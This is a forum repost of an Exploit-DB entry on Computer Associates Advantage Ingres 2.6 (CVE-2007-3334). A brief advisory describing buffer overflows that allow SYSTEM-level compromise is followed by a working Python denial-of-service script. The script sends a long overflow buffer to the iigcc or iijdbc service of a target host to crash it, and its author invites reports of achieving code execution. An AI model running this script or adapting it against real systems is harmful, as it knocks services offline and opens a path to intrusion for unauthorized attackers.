Exploit Ingress Database Server 2.6 - Multiple Remote Vulnerabilities

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
30224
Проверка EDB
  1. Пройдено
Автор
ANONYMOUS
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2007-3334
Дата публикации
2007-06-21
Код:
source: https://www.securityfocus.com/bid/24585/info

Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.

Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.

# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>

import socket
import sys

if len(sys.argv) != 4:
    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]

if service == "iigcc":
        payload = "\x41" * 2106
elif service == "iijdbc":
        payload = "\x41" * 1066
else:
        print "Vulnerable Services: iigcc, iijdbc"
        sys.exit(1)

payload += "\x42" * 4

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)

print service + " crashed"
 
Источник
www.exploit-db.com

Похожие темы